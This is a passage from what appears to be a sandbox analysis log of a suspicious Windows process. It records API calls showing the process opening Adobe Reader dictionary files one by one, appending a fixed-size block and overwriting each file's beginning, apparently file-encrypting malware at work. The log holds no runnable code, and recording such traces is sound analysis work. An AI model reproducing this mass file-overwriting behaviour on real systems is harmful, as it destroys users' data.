lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="can03.ths", lpUsedDefaultChar=0x0) returned 9 [0114.044] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0114.047] ReadFile (in: hFile=0x1f0, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.048] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xa0c00 [0114.048] ReadFile (in: hFile=0x1f0, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.055] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xa0c00 [0114.056] WriteFile (in: hFile=0x1f0, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.057] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0114.057] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0114.057] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.058] CloseHandle (hObject=0x1f0) returned 1 [0114.058] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ctl.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ctl.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0114.061] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.061] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x314 [0114.061] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.061] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.062] ReleaseMutex (hMutex=0x168) returned 1 [0114.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ctl.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ctl.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ctl.fca", lpUsedDefaultChar=0x0) returned 7 [0114.062] ReadFile (in: hFile=0x1f0, lpBuffer=0x2663858, nNumberOfBytesToRead=0x314, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x2d5f2bc*=0x314, lpOverlapped=0x0) returned 1 [0114.065] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0114.066] WriteFile (in: hFile=0x1f0, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x89c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2d5f2d0*=0x89c, lpOverlapped=0x0) returned 1 [0114.066] CloseHandle (hObject=0x1f0) returned 1 [0114.066] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dan.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dan.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0114.067] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.067] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7c00 [0114.067] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.067] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.068] ReleaseMutex (hMutex=0x168) returned 1 [0114.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dan.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0114.068] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dan.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac6c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dan.hyp", lpUsedDefaultChar=0x0) returned 7 [0114.068] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea7988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.640] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6c00 [0114.640] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.933] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6c00 [0114.934] WriteFile (in: hFile=0x1f0, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.935] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0114.935] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.935] CloseHandle (hObject=0x1f0) returned 1 [0114.935] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\dut32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\dut32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0114.936] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.937] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7ff4 [0114.937] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.937] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.937] ReleaseMutex (hMutex=0x168) returned 1 [0114.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dut32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dut32.clx", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dut32.clx", lpUsedDefaultChar=0x0) returned 9 [0114.937] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.950] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6ff4 [0114.950] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0114.974] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6ff4 [0114.974] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0114.975] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0114.975] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0114.976] CloseHandle (hObject=0x1f0) returned 1 [0114.976] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\estphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\estphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0114.976] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.977] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1029 [0114.977] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0114.977] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0114.977] ReleaseMutex (hMutex=0x168) returned 1 [0114.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="estphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0114.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="estphon.env", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="estphon.env", lpUsedDefaultChar=0x0) returned 11 [0114.977] ReadFile (in: hFile=0x1f0, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1029, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x2d5f2bc*=0x1029, lpOverlapped=0x0) returned 1 [0114.994] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0114.994] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x15b1, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x15b1, lpOverlapped=0x0) returned 1 [0115.008] CloseHandle (hObject=0x1f0) returned 1 [0115.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0115.010] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0115.010] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7ff6 [0115.010] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0115.010] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.010] ReleaseMutex (hMutex=0x168) returned 1 [0115.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frn32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frn32.clx", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="frn32.clx", lpUsedDefaultChar=0x0) returned 9 [0115.010] ReadFile (in: hFile=0x1f0, lpBuffer=0x1ea99b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99b8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.030] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6ff6 [0115.030] ReadFile (in: hFile=0x1f0, lpBuffer=0x2667868, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.048] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6ff6 [0115.048] WriteFile (in: hFile=0x1f0, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.049] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0115.049] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e963d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.049] CloseHandle (hObject=0x1f0) returned 1 [0115.050] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm104.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm104.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0115.080] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0115.080] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x98af7 [0115.080] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0115.081] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.081] ReleaseMutex (hMutex=0x168) returned 1 [0115.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="grm104.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="grm104.hsp", cchWideChar=10, lpMultiByteStr=0x1f732cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="grm104.hsp", lpUsedDefaultChar=0x0) returned 10 [0115.081] ReadFile (in: hFile=0x204, lpBuffer=0x28ad9a8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0115.114] ReadFile (in: hFile=0x204, lpBuffer=0x28ad9a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x28ad9a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.135] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x97af7 [0115.135] ReadFile (in: hFile=0x204, lpBuffer=0x1e963d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e963d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.437] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x97af7 [0115.439] WriteFile (in: hFile=0x204, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.439] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0115.440] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0115.440] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.440] CloseHandle (hObject=0x204) returned 1 [0115.441] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv132.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv132.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0115.442] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0115.442] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x97000 [0115.442] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0115.442] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.442] ReleaseMutex (hMutex=0x168) returned 1 [0115.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hrv132.lex", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hrv132.lex", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hrv132.lex", lpUsedDefaultChar=0x0) returned 10 [0115.442] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0115.464] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.483] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x96000 [0115.483] ReadFile (in: hFile=0x204, lpBuffer=0x1ea89b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea89b8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.633] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x96000 [0115.634] WriteFile (in: hFile=0x204, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.635] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0115.635] WriteFile (in: hFile=0x204, lpBuffer=0x27fc5d8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27fc5d8*, lpNumberOfBytesWritten=0x2d5f28c*=0xf000, lpOverlapped=0x0) returned 1 [0115.635] WriteFile (in: hFile=0x204, lpBuffer=0x27fc5d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x27fc5d8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0115.635] CloseHandle (hObject=0x204) returned 1 [0115.636] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0115.637] SetFilePointer (in: 